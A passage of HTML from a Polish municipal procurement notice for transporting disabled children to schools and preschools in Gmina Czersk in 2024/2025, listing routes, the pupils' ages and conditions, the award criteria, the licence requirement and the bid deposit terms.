odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/>Część 3: Szkoły Podstawowej Nr 1 w Czersku pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 <br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/>Część 3: Szkoły Podstawowej Nr 1 w Czersku pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 na trasie: <br/><br/>-	Stodółki – Czersk (szkoła) - Stodółki – ok. 17 km (2 kursy dziennie)<br/>Planowana liczba korzystających z dowożenia – 1.<br/><br/>Łączny dzienny przebieg pojazdu 34 km.<br/><br/>Dowożenie ucznia niepełnosprawnego odbywać się będzie w dni pracy szkoły wg harmonogramu podanego przez dyrektora szkoły<br/>-	rozpoczęcie zajęć: godzina 8:00 <br/>-	zakończenie zajęć: w godzinach 12:35 – 13:35<br/><br/>Liczba uczniów objętych przewozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. Uczeń niepełnosprawny porusza się na wózku inwalidzkim.<br/><br/>UWAGA <br/>U dowożonego ucznia występują następujące schorzenia i dysfunkcje:<br/>1)	niepełnosprawność sprzężona <br/>2)	niepełnosprawność ruchowa<br/>3)	niedosłuch<br/><br/>Dowożony uczeń jest w wieku 10 lat. Porusza się na wózku inwalidzkim.<br/><br/>Wykonawca musi zapewnić opiekę dla przewożonego ucznia niepełnosprawnego na trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożonym uczniem niepełnosprawnym i zobowiązany jest do udzielania czynnej pomocy uczniowi niepełnosprawnemu w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonego ucznia personelowi szkoły.<br/>W sposób szczególny traktowany być musi uczeń niepełnosprawny korzystający z wózka inwalidzkiego.<br/><br/>Kierowca nie może być jednocześnie opiekunem ucznia niepełnosprawnego. W pojeździe musi znajdować się kierowca i opiekun. <br/><br/>Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/><br/>Część 4: Zespołu Szkół w Malachinie pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 <br/><br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/><br/>Część 4: Zespołu Szkół w Malachinie pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 na trasie: <br/><br/>-	Czersk – ZS w Malachinie – Czersk – ok. 10 km (2 kursy dziennie)<br/>Planowana liczba korzystających z dowożenia – 1.<br/><br/>Łączny dzienny przebieg pojazdu 20 km.<br/><br/>Dowożenie ucznia niepełnosprawnego odbywać się będzie w dni pracy szkoły wg harmonogramu podanego przez dyrektora zespołu szkół: <br/>-	rozpoczęcie zajęć: godzina 8:00 <br/>-	zakończenie zajęć: w godzinach 13:00 - 16:00<br/><br/>Liczba uczniów objętych przewozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. <br/><br/>UWAGA <br/>U dowożonego ucznia występują następujące schorzenia i dysfunkcje:<br/>1)	niepełnosprawność w stopniu znacznym<br/>2)	niepełnosprawność ruchowa<br/><br/>Dowożony uczeń jest w wieku 19 lat. <br/><br/>Wykonawca musi zapewnić opiekę dla przewożonego ucznia niepełnosprawnego na trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożonym uczniem niepełnosprawnym i zobowiązany jest do udzielania czynnej pomocy uczniowi niepełnosprawnemu w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonego ucznia personelowi szkoły.<br/><br/>Kierowca nie może być jednocześnie opiekunem ucznia niepełnosprawnego. W pojeździe musi znajdować się kierowca i opiekun. <br/><br/>Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/><br/>Część 5: Szkoły Podstawowej w Odrach pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 <br/><br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/><br/>Część 5: Szkoły Podstawowej w Odrach pojazdem o minimalnej liczbie miejsc siedzących z kierowcą – 9 na trasie: <br/><br/>-	Czersk – Odry (szkoła) – Czersk – ok. 26 km (2 kursy dziennie)<br/>Planowana liczba korzystających z dowożenia – 1.<br/><br/>Łączny dzienny przebieg pojazdu 52 km.<br/><br/>Dowożenie ucznia niepełnosprawnego odbywać się będzie w dni pracy szkoły wg harmonogramu podanego przez dyrektora szkoły: <br/>-	rozpoczęcie zajęć: godzina 8:15 <br/>-	zakończenie zajęć: <br/>poniedziałek – czwartek – 13:50 <br/>piątek – 11:45<br/><br/>Liczba uczniów objętych przewozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. <br/><br/>UWAGA <br/>U dowożonego ucznia występują następujące schorzenia i dysfunkcje:<br/>1)	mózgowe porażenie dziecięce<br/>2)	głębokie niedowidzenie<br/>3)	zaburzenia emocjonalne<br/><br/>Dowożony uczeń jest w wieku 8 lat. <br/><br/>Przewożony uczeń potrzebuje pomocy przy wejściu i wyjściu z pojazdu. Uczeń musi mieć zapewniony fotelik podczas jazdy. <br/>Wykonawca musi zapewnić opiekę dla przewożonego ucznia niepełnosprawnego na trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożonym uczniem niepełnosprawnym i zobowiązany jest do udzielania czynnej pomocy uczniowi niepełnosprawnemu w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonego ucznia personelowi szkoły.<br/><br/>Kierowca nie może być jednocześnie opiekunem ucznia niepełnosprawnego. W pojeździe musi znajdować się kierowca i opiekun. <br/><br/>5.2.	Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest: „Dowożenie dzieci/uczniów/osób niepełnosprawnych z terenu Gminy Czersk w roku szkolnym 2024/2025 z podziałem na części”<br/>Część 6: dwóch Przedszkoli Integracyjno – Terapeutycznych „Pani Wiaderko” w Chojnicach środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9<br/><br/>1.	Przedmiotem zamówienia jest dowożenie osób do:<br/>Część 6: Dwóch Przedszkoli Integracyjno – Terapeutycznych „Pani Wiaderko” w Chojnicach środkiem transportu o minimalnej liczbie miejsc siedzących z kierowcą – 9 na następującej trasie:<br/><br/>-	Mokre - Czersk – Chojnice – Czersk – ok. 40 km (1 kurs dziennie) <br/>Planowana liczba dowożonych dzieci: – 5, w tym:<br/>- z miejscowości Czersk – 4 dzieci<br/>- z miejscowości Mokre – 1 dziecko<br/><br/>Łączny dzienny przebieg pojazdu ok. 40 km.<br/><br/>Dowożenie dzieci niepełnosprawnych odbywać się będzie w dni pracy przedszkoli wg harmonogramu podanego przez dyrektora przedszkoli: <br/><br/>-	rozpoczęcie zajęć: godzina 8.00 <br/><br/>Liczba dzieci niepełnosprawnych objętych dowozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. <br/><br/>UWAGA <br/><br/>U dowożonych dzieci występują następujące schorzenia i dysfunkcje:<br/>1)	afazja<br/>2)	opóźnienie psycho-ruchowe<br/>3)	padaczka lekooporna<br/>4)	zespół Angelmana<br/>5)	autyzm<br/>6)	dziecięce porażenie mózgowe.<br/><br/>Jedno dziecko wykazuje samoagresję i nie reaguje na polecenia, jednak wykonuje je przy pomocy osoby dorosłej. Wszystkie dzieci poruszają się samodzielnie, mogą potrzebować pomocy przy wejściu lub wyjściu z pojazdu.<br/><br/>Dowożone dzieci są w wieku: 5 lat - (1 dziecko), 6 lat – (1 dziecko) i 7 lat – (3 dzieci).<br/>Wszystkie dzieci muszą mieć zapewnione foteliki podczas jazdy. <br/><br/>Wykonawca musi zapewnić opiekę dla przewożonych dzieci niepełnosprawnych na całej trasie przewozu.<br/>Osoby zatrudnione do sprawowania opieki muszą posiadać odpowiednie kwalifikacje. Opiekun sprawuje nadzór nad przewożonymi dziećmi niepełnosprawnymi i zobowiązany jest do udzielania czynnej pomocy dzieciom w bezpiecznym zajęciu miejsca w pojeździe, opieki podczas trwania podróży, przy opuszczaniu pojazdu po jej zakończeniu i podczas przekazania przewożonej grupy dzieci personelowi przedszkoli. <br/><br/>Kierowca nie może być jednocześnie opiekunem dzieci niepełnosprawnych. W pojeździe musi znajdować się kierowca i opiekun. <br/>5.2.	Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, kosztorysach ofertowych oraz projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Cena ofertowa brutto –„C”- 60% Z tytułu niniejszego kryterium max. Ilość punków: 60<br/>Termin płatności za fakturę – „T”- 40 % Z tytułu niniejszego kryterium max. Ilość punków: 40<br/>za oferowany termin płatności za fakturę do 14 dni - 0 punktów<br/>za oferowany termin płatności za fakturę do 30 dni - 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności za fakturę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt 9 SWZ oraz spełniają warunki udziału w postępowaniu <br/>w zakresie: DOTYCZY: CZ.I, CZ.II, CZ.III, CZ.IV, CZ.V, CZ.VI<br/><br/>10.1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów.<br/>10.1.2.1.	Zamawiający żąda aby Wykonawca posiadał licencję na wykonywanie krajowego transportu drogowego osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">DOTYCZY: CZ.I, CZ.II, CZ.III, CZ.IV, CZ.V, CZ.VI<br/>oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2021 r. poz. 275 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">DOTYCZY: CZ.I, CZ.II, CZ.III, CZ.IV, CZ.V, CZ.VI<br/>Licencja na wykonywanie krajowego transportu drogowego osób</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.3.	Ofertę składa się na Formularzu Ofertowym – zgodnie z załącznikiem nr 1 do SWZ. <br/>Wraz z ofertą wykonawca jest zobowiązany złożyć:<br/>12.3.1.	oświadczenie, ( o którym mowa w pkt 11.1.1 SWZ), o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego według wzoru stanowiącego zał. nr 2 do SWZ.<br/>12.3.2.	KOSZTORYS OFERTOWY - zgodnie ze wzorem załączonym w załączniku nr 4 do SWZ<br/>12.3.3.	zobowiązanie podmiotu udostępniającego zasoby , zgodnie ze wzorem stanowiącym zał. nr 3 do SWZ (jeżeli dotyczy),<br/>12.3.4.	oświadczenie, (o którym mowa w pkt 11.1.2 SWZ) składane na podstawie art. 117 ust. 4 Pzp, z którego wynika, które usługi wykonają poszczególni wykonawcy – dotyczy tylko wykonawców wspólnie ubiegających się o zamówienie, zgodnie z zał. nr 9 do SWZ.<br/><br/>12.3.5.	oświadczenie, (o którym mowa w pkt 11.1.3 SWZ) (w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby), podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z załącznikiem nr 8 do SWZ.<br/>12.3.6.	Wadium, w przypadku gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca zobowiązany jest do złożenia oryginału dokumentu,<br/>12.3.7.	pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58 ust. 2 ustawy Prawo zamówień publicznych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 18.1.	Zamawiający żąda wniesienia wadium w kwocie: <br/>18.1.1.	Część 1: 1 300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100)<br/>18.1.2.	Część 2: 500,00 zł (słownie: pięćset złotych 00/100)<br/>18.1.3.	Część 3: nie dotyczy<br/>18.1.4.	Część 4: nie dotyczy<br/>18.1.5.	Część 5: 400,00 zł (słownie: czterysta złotych 00/100)<br/>18.1.6.	Część 6: 500,00 zł (słownie: pięćset złotych 00/100)<br/>18.2.	Wadium może być wniesione według wyboru wykonawcy w jednej lub kilku formach o których mowa w art. 97 ust. 7 ustawy Pzp:<br/>18.2.1.	pieniądzu,<br/>18.2.2.	gwarancjach bankowych,<br/>18.2.3.	gwarancjach ubezpieczeniowych,<br/>18.2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>(t. j. - Dz. U. z 2020 r. poz. 299 ze zm.).<br/>18.3.	Wadium należy wnieść przed upływem terminu składania ofert.<br/>18.4.	W przypadku wnoszenia wadium w pieniądzu kwotę, o której mowa w pkt 8.1 SWZ należy wpłacić przelewem na rachunek bankowy: Bank Spółdzielczy w Skórczu, numer 38 8342 0009 2019 5000 2575 0004 z dopiskiem: wadium DYR.261.4.2024 CZ…. (wpisać numer części zamówienia). Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na wskazanym rachunku bankowym przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>18.5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>18.6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt od 18.2.2 – 18.2.4 SWZ, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej za pośrednictwem Platformy zakupowej. Dokument musi być opatrzony kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia.<br/>18.7.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>18.8.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>18.9.	Okoliczności i zasady zwrotu wadium oraz jego zatrzymania określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 21.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>21.2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 11.1.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>21.3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie składane na podstawie art. 117 ust. 4 Pzp, z którego wynika, które usługi wykonają poszczególni wykonawcy –zgodnie z załącznikiem nr 9 do SWZ.<br/>21.4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje 